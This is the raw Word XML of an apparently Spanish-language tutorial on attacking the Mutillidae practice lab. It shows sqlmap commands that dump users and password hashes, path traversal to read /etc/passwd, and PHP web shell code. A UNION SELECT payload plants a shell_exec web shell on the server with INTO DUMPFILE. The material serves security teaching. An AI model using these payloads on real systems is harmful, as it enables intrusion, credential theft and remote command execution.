          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6B68E26F" wp14:editId="4EBB6DED">
            <wp:extent cx="5400040" cy="2945130"/>
            <wp:effectExtent l="0" t="0" r="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945130"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D5AB685" w14:textId="429D71A3" w:rsidR="006B77D1" w:rsidRDefault="006B77D1" w:rsidP="00647990"/>
    <w:p w14:paraId="2D1D491E" w14:textId="014F55EF" w:rsidR="002529A8" w:rsidRDefault="002529A8" w:rsidP="00647990">
      <w:r>
        <w:t>A continuación, podemos usar SQLmap, para ello y como uso cotidiano, acostumbramos a usar el parámetro --flush-session que es para que no tenga en cuenta anteriores consultas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74BA5699" w14:textId="424E11D5" w:rsidR="002529A8" w:rsidRDefault="002529A8" w:rsidP="00647990">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Ahora sí, el comando para que analizara el txt de burpsuite sería:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="480EF810" w14:textId="794AD212" w:rsidR="002529A8" w:rsidRPr="002529A8" w:rsidRDefault="002529A8" w:rsidP="00647990">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002529A8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sqlmap --flush-session -r Deskt</w:t>
      </w:r>
      <w:r w:rsidR="00707B9A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>o</w:t>
      </w:r>
      <w:r w:rsidRPr="002529A8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>p/request_burp.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="311C2683" w14:textId="13465D1C" w:rsidR="002529A8" w:rsidRDefault="002529A8" w:rsidP="002529A8">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="002529A8">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1DA9EBB6" wp14:editId="40A36332">
            <wp:extent cx="5400040" cy="1504315"/>
            <wp:effectExtent l="0" t="0" r="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1504315"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D6EBA6A" w14:textId="29546D46" w:rsidR="002529A8" w:rsidRDefault="002529A8" w:rsidP="002529A8">
      <w:r>
        <w:t>Como vemos, nos preguntará primero que el sitio le está redirigiendo a otro lado y pregunta si quiere que sea redirigido a la página principal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26F0DCF0" w14:textId="3A36699E" w:rsidR="002529A8" w:rsidRDefault="002529A8" w:rsidP="002529A8">
      <w:r w:rsidRPr="002529A8">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="45BD8866" wp14:editId="6826F94A">
            <wp:extent cx="5400040" cy="10674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067435"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="547EB527" w14:textId="426BCFDE" w:rsidR="002529A8" w:rsidRDefault="002529A8" w:rsidP="002529A8">
      <w:r>
        <w:t>Al pulsar que no, gracias a unas pruebas muy básicas, descubre que el sitio está usando MySQL, por lo que pregunta si pueda saltarse la comprobación y los payloads para descubrir el motor, ya que no lo necesita la mayor parte de las veces que pregunte, pulsamos que sí.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D125649" w14:textId="28BF53FC" w:rsidR="00366CC3" w:rsidRDefault="00366CC3" w:rsidP="002529A8">
      <w:r w:rsidRPr="00366CC3">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4A847523" wp14:editId="00A3D8C3">
            <wp:extent cx="5400040" cy="34607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46075"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F05A54B" w14:textId="26DA600C" w:rsidR="00366CC3" w:rsidRDefault="00366CC3" w:rsidP="002529A8">
      <w:r>
        <w:t>Y pregunta por si quieres que pruebe algunos test cuyo riesgo es más elevado. Es un entorno de pruebas y no hay motivo por lo que ignorarlo, así que pulsamos en Sí.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A36156" w14:textId="44DFDAE3" w:rsidR="00366CC3" w:rsidRDefault="00366CC3" w:rsidP="002529A8">
      <w:r w:rsidRPr="00366CC3">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="253B5FB8" wp14:editId="17842DDB">
            <wp:extent cx="5400040" cy="1520825"/>
            <wp:effectExtent l="0" t="0" r="0" b="317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520825"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ADD165F" w14:textId="0BB9B740" w:rsidR="00366CC3" w:rsidRDefault="00366CC3" w:rsidP="002529A8">
      <w:r>
        <w:t>Como vemos, nos está avisando en negrita que username es vulnerable a blind. Y podría continuar en búsqueda de los distintos parámetros. Pero vamos a ver un ejemplo de ataque para descubrir el usuario actual, para ello, sabiendo que el parámetro username es vulnerable por Blind (B), usaremos el comando:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EB7D3BC" w14:textId="3EEE4D71" w:rsidR="00366CC3" w:rsidRPr="00366CC3" w:rsidRDefault="00366CC3" w:rsidP="002529A8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00366CC3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sqlmap --ignore-redirects --technique B -p username --current-user -r Desktop/request_burp.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="571DC9E8" w14:textId="1BA52755" w:rsidR="00366CC3" w:rsidRDefault="00366CC3" w:rsidP="002529A8">
      <w:r>
        <w:t xml:space="preserve">Con </w:t>
      </w:r>
      <w:r w:rsidR="00A821B7">
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:t>ignore-redirects deja de preguntar por el redireccionamiento y con --techique B usará la técnica Blind</w:t>
      </w:r>
      <w:r w:rsidR="00A821B7">
        <w:t>, con --batch no preguntará tantas cosas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C6700B" w14:textId="3DAD3CC4" w:rsidR="00366CC3" w:rsidRDefault="00A821B7" w:rsidP="00A821B7">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00A821B7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5D9061DF" wp14:editId="75B862A5">
            <wp:extent cx="5400040" cy="374142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741420"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3223B0ED" w14:textId="797EA55C" w:rsidR="00A821B7" w:rsidRDefault="00A821B7" w:rsidP="00A821B7">
      <w:r>
        <w:t>Para conseguir las contraseñas, el comando, podemos usar el parámetro --password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E21E20" w14:textId="65D36B66" w:rsidR="00A821B7" w:rsidRDefault="00A821B7" w:rsidP="00A821B7">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A821B7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sqlmap --ignore-redirects --batch --technique B -p username --password -r Desktop/request_burp.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ACC1419" w14:textId="5AF6A257" w:rsidR="00A821B7" w:rsidRDefault="00A821B7" w:rsidP="00A821B7">
      <w:r w:rsidRPr="00A821B7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="09757784" wp14:editId="15DD0432">
            <wp:extent cx="5400040" cy="1710690"/>
            <wp:effectExtent l="0" t="0" r="0" b="381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710690"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0988DE14" w14:textId="2143A0A2" w:rsidR="00A821B7" w:rsidRDefault="00A821B7" w:rsidP="00A821B7">
      <w:r>
        <w:t xml:space="preserve">Tras un rato, obtendremos las contraseñas </w:t>
      </w:r>
      <w:r w:rsidR="00754995">
        <w:t>h</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">asheadas, listas para ser descifradas. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F9B3B24" w14:textId="77777777" w:rsidR="00A821B7" w:rsidRDefault="00A821B7" w:rsidP="00A821B7">
      <w:r>
        <w:t>Aquí una lista de algunas utilidades</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59833857" w14:textId="3C9298A7" w:rsidR="00A821B7" w:rsidRDefault="00A821B7" w:rsidP="00A821B7">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A821B7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-U root@localhost</w:t>
      </w:r>
      <w:r>
        <w:t>, nos permite centrarnos en un único usuario.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E21EB2" w14:textId="04D9D95A" w:rsidR="00A821B7" w:rsidRDefault="00A821B7" w:rsidP="00A821B7">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A821B7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>--dbs</w:t>
      </w:r>
      <w:r>
        <w:t>, nos permite obtener el nombre de la base de datos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3473F2BD" w14:textId="1C8CA300" w:rsidR="00A821B7" w:rsidRDefault="00A821B7" w:rsidP="00A821B7">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A821B7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-v</w:t>
      </w:r>
      <w:r>
        <w:t>, opción Verbose, para mostrar más información</w:t>
      </w:r>
      <w:r w:rsidR="00754995">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61AE853C" w14:textId="6502192C" w:rsidR="00754995" w:rsidRPr="00754995" w:rsidRDefault="00754995" w:rsidP="00A821B7">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-D mutillidae</w:t>
      </w:r>
      <w:r w:rsidRPr="00754995">
        <w:t>, se centra en una base de datos</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> para obtener sus tablas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55716B3A" w14:textId="764FB95C" w:rsidR="00754995" w:rsidRPr="00E87029" w:rsidRDefault="00754995" w:rsidP="00A821B7">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-T</w:t>
      </w:r>
      <w:r w:rsidR="00E87029">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00E87029" w:rsidRPr="00E87029">
        <w:t xml:space="preserve">se centra en una tabla para sacar </w:t>
      </w:r>
      <w:r w:rsidR="00E87029">
        <w:t xml:space="preserve">todas </w:t>
      </w:r>
      <w:r w:rsidR="00E87029" w:rsidRPr="00E87029">
        <w:t>sus columnas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A14A49E" w14:textId="44AA2641" w:rsidR="00A821B7" w:rsidRDefault="00A821B7" w:rsidP="00707B9A"/>
    <w:p w14:paraId="68DCEF3D" w14:textId="67F363C8" w:rsidR="00A821B7" w:rsidRDefault="00A821B7" w:rsidP="00A821B7"/>
    <w:p w14:paraId="7F47D063" w14:textId="011252EA" w:rsidR="00707B9A" w:rsidRDefault="00707B9A" w:rsidP="00A821B7"/>
    <w:p w14:paraId="48C39214" w14:textId="591A2FB8" w:rsidR="00707B9A" w:rsidRPr="00914F90" w:rsidRDefault="00707B9A" w:rsidP="00A821B7">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00707B9A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Path Traversal:</w:t>
      </w:r>
      <w:r w:rsidR="00914F90">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>A veces, notamos que en la URL podemos ver que aparece el nombre del archivo php que está enviando</w:t>
      </w:r>
      <w:r w:rsidR="00914F90">
        <w:t>. Esto es especialmente útil porque podemos “escaparnos” de la estructura y pedir otros archivos del sistema:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="177019B0" w14:textId="0B7808B1" w:rsidR="00914F90" w:rsidRDefault="00914F90" w:rsidP="00914F90">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00914F90">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="25413AE0" wp14:editId="527C73EC">
            <wp:extent cx="3581710" cy="251482"/>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81710" cy="251482"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F22D9E" w14:textId="22E7D8DB" w:rsidR="00914F90" w:rsidRDefault="00914F90" w:rsidP="00A821B7">
      <w:r>
        <w:t>Ponemos tantas barras posibles para asegurarnos de ir atrás del todo:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F4CD0FA" w14:textId="740FF7CA" w:rsidR="00914F90" w:rsidRDefault="00914F90" w:rsidP="00914F90">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00914F90">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2F887689" wp14:editId="2138453B">
            <wp:extent cx="4046571" cy="320068"/>
            <wp:effectExtent l="0" t="0" r="0" b="381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46571" cy="320068"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A1E7C9" w14:textId="7A9DB73C" w:rsidR="00914F90" w:rsidRDefault="00914F90" w:rsidP="00A821B7">
      <w:r>
        <w:t>Y el resultado es que ha devuelto el fichero del sistema /etc/passwd:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B230268" w14:textId="0F8B6871" w:rsidR="00914F90" w:rsidRDefault="00914F90" w:rsidP="00914F90">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00914F90">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="46B7EF74" wp14:editId="51EC5F47">
            <wp:extent cx="5400040" cy="185483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854835"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="72328366" w14:textId="33F93FB2" w:rsidR="00914F90" w:rsidRDefault="00914F90" w:rsidP="00A821B7">
      <w:r>
        <w:t>Si el sistema, en vez de un Linux, fuera un Windows, para ir atrás usamos la barra \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C0D5AAA" w14:textId="03FB312E" w:rsidR="00914F90" w:rsidRDefault="00914F90" w:rsidP="00914F90">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00914F90">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5D9A4A88" wp14:editId="032A2C89">
            <wp:extent cx="1005927" cy="213378"/>
            <wp:effectExtent l="0" t="0" r="381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005927" cy="213378"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="569A6809" w14:textId="7AFD148A" w:rsidR="00914F90" w:rsidRDefault="00CE1018" w:rsidP="00CE1018">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>WebShells</w:t>
      </w:r>
      <w:r w:rsidRPr="00707B9A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE1018">
        <w:t>No es una vulnerabilidad, es un fragmento de código, un payload para aprovecharse de una vulnerabilidad, dejar un fichero en el server y posteriormente explotarla.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A09F16F" w14:textId="2ADCB35C" w:rsidR="00CE1018" w:rsidRDefault="00CE1018" w:rsidP="00CE1018">
      <w:r>
        <w:t>Una de las webshell más conocidas es una programada en PHP:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD9A77C" w14:textId="273C11C3" w:rsidR="00CE1018" w:rsidRDefault="00CE1018" w:rsidP="00CE1018">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE1018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>&lt;?php echo passthru($_GET[</w:t>
      </w:r>
      <w:r w:rsidR="00F10B88">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE1018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>cmd</w:t>
      </w:r>
      <w:r w:rsidR="00F10B88">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE1018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>]); ?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="187C641B" w14:textId="1C790717" w:rsidR="00CE1018" w:rsidRDefault="00CE1018" w:rsidP="00CE1018">
      <w:r>
        <w:t>Si subimos ese archivo al servidor, podremos ejecutar código desde nuestro navegador pasándole comandos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A11B3E7" w14:textId="21B5EDFF" w:rsidR="00F10B88" w:rsidRDefault="00F10B88" w:rsidP="00CE1018">
      <w:r>
        <w:t>Para introducir esta webshell, nos dirigimos a una página vulnerable y, en nuestro caso introducimos</w:t>
      </w:r>
      <w:r w:rsidR="00D11DC1">
        <w:t xml:space="preserve"> (recuerda quitar o añadir null conforme a la cantidad de columnas, el código anterior puede ser sustituido por el siguiente código para hacer algo más simple)</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D86CF1" w14:textId="3EAC73F5" w:rsidR="00F10B88" w:rsidRDefault="00F10B88" w:rsidP="00F10B88">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F10B88">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">' union select </w:t>
      </w:r>
      <w:r w:rsidR="00D11DC1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>null,null,</w:t>
      </w:r>
      <w:r w:rsidRPr="00F10B88">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>null,null,null,null,'&lt;form action="" method="post" enctype="application/x-www-form-urlencoded"&gt;&lt;table style="margin-left:auto; margin-right:auto;"&gt;&lt;tr&gt;&lt;td colspan="2"&gt;Please enter system command&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="label"&gt;Command&lt;/td&gt;&lt;td&gt;&lt;input type="text" name="pCommand" size="50"&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td colspan="2" style="text-align:center;"&gt;&lt;input type="submit" value="Execute Command" /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/form&gt;&lt;?php echo "&lt;pre&gt;";echo shell_exec($_REQUEST["pCommand"]);echo "&lt;/pre&gt;"; ?&gt;' INTO DUMPFILE '</w:t>
      </w:r>
      <w:r w:rsidR="00C17D7A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>../../../../../var/www/html/mutillidae/puerta.php</w:t>
      </w:r>
      <w:r w:rsidRPr="00F10B88">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">-- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02621563" w14:textId="0687BA85" w:rsidR="00F10B88" w:rsidRDefault="00F10B88" w:rsidP="00F10B88">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7030A0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7030A0"/>
        </w:rPr>
        <w:t>¡</w:t>
      </w:r>
      <w:r w:rsidRPr="00F10B88">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7030A0"/>
        </w:rPr>
        <w:t>No olvides el espacio al final del código</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7030A0"/>
        </w:rPr>
        <w:t>!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="200B26C2" w14:textId="1C4E7969" w:rsidR="00D11DC1" w:rsidRDefault="00D11DC1" w:rsidP="00D11DC1">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7030A0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D11DC1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:color w:val="7030A0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1D7A1D03" wp14:editId="71B08796">
            <wp:extent cx="5400040" cy="27305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730500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="099464A0" w14:textId="3F339E1A" w:rsidR="00D11DC1" w:rsidRDefault="00D11DC1" w:rsidP="00D11DC1">
      <w:r w:rsidRPr="00D11DC1">
        <w:t>Si todo ha ido correcto, nuestro fichero debe haber sido creado en la correspondiente ruta.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A4515A0" w14:textId="322A1CC4" w:rsidR="005D743D" w:rsidRPr="005D743D" w:rsidRDefault="005D743D" w:rsidP="005D743D">
      <w:r w:rsidRPr="005D743D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Subida de Ficheros sin restricción:</w:t>
      </w:r>
      <w:r w:rsidRPr="005D743D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Si un sitio web permite subir ficheros, podremos subir una webshell y posteriormente usar el Path Traversal para acceder a ello.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6146B8D9" w14:textId="77777777" w:rsidR="009A1BA3" w:rsidRDefault="005D743D" w:rsidP="009A1BA3">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="7030A0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D743D">
        <w:rPr>
          <w:noProof/>
          <w:color w:val="7030A0"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="75F623BB" wp14:editId="6983517A">
            <wp:extent cx="5400040" cy="164338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643380"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="588B617C" w14:textId="6E0F4358" w:rsidR="009A1BA3" w:rsidRDefault="009A1BA3" w:rsidP="009A1BA3">
      <w:r w:rsidRPr="009A1BA3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Inyección HTML</w:t>
      </w:r>
      <w:r w:rsidR="00C57A0A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> y </w:t>
      </w:r>
      <w:r w:rsidR="00C57A0A" w:rsidRPr="009A1BA3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Cross-Site-Scripting</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="009A1BA3">
        <w:t>Po</w:t>
      </w:r>
      <w:r>
        <w:t>demos probar en algún formulario a añadir caracteres propios de HTML como “&lt;&gt;” para ver si el formulario lo sanetiza. Si no los borra o los detecta como impropios, podríamos fácilmente inyectar código html que interfiera con el código de la página.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="208BD5DD" w14:textId="53123CBF" w:rsidR="009A1BA3" w:rsidRDefault="009A1BA3" w:rsidP="009A1BA3">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="009A1BA3">
        <w:rPr>
